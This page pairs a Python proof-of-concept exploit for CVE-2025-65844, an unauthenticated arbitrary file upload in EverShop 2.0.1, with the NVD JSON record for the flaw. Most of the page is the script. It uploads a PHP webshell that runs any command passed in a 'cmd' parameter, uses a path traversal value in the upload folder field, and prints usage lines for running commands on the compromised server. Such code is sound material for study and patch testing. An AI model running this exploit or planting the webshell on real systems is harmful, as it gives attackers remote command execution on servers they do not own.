CVE-2025-65844

#!/usr/bin/env python3 """ CVE-2025-65844 PoC - EverShop 2.0.1 Arbitrary File Upload Author: Security Researcher """ import requests import sys import random import string def generate_random_string(length=8): """Generate random string for filename""" return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length)) def upload_webshell(target_url, webshell_content=None): """ Upload malicious webshell to EverShop server """ if webshell_content is None: webshell_content = '''<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; } ?> ''' endpoint = f"{target_url.rstrip('/')}/api/images" filename = f"{generate_random_string()}.php" files = { 'file': (filename, webshell_content, 'application/x-php') } data = { 'folder': '../../../public/uploads' # Path traversal attempt } print(f"[*] Target: {target_url}") print(f"[*] Uploading webshell to {endpoint}") try: response = requests.post(endpoint, files=files, data=data, timeout=30) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text}") if response.status_code == 200: print("[+] File uploaded successfully!") print(f"[+] Webshell location: {target_url}/uploads/{filename}") print(f"[+] Usage: {target_url}/uploads/{filename}?cmd=whoami") return True else: print("[-] Upload failed!") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False def main(): if len(sys.argv) < 2: print("Usage: python3 cve-2025-65844.py <target_url>") print("Example: python3 cve-2025-65844.py http://victim.com") sys.exit(1) target = sys.argv[1] upload_webshell(target) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-65844", "sourceIdentifier": "[email protected]", "published": "2025-12-02T18:15:49.243", "lastModified": "2025-12-06T04:15:47.380", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "EverShop 2.0.1 allows a remote unauthenticated attacker to upload arbitrary files and create directories via the /api/images endpoint. The endpoint is accessible without authentication by default, and server-side validation of uploaded files is insufficient. This can be abused to upload arbitrary content (including non-image files) which could impersonate user/admin login panels (exfiltrating credentials) and to perform a denial-of-service attack by exhausting disk space."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:evershop:evershop:2.0.1:*:*:*:*:node.js:*:*", "matchCriteriaId": "2D3A8F90-D61A-4B77-9A57-001AB1BA08DF"}]}]}], "references": [{"url": "https://github.com/evershopcommerce/evershop/issues/819", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}]}}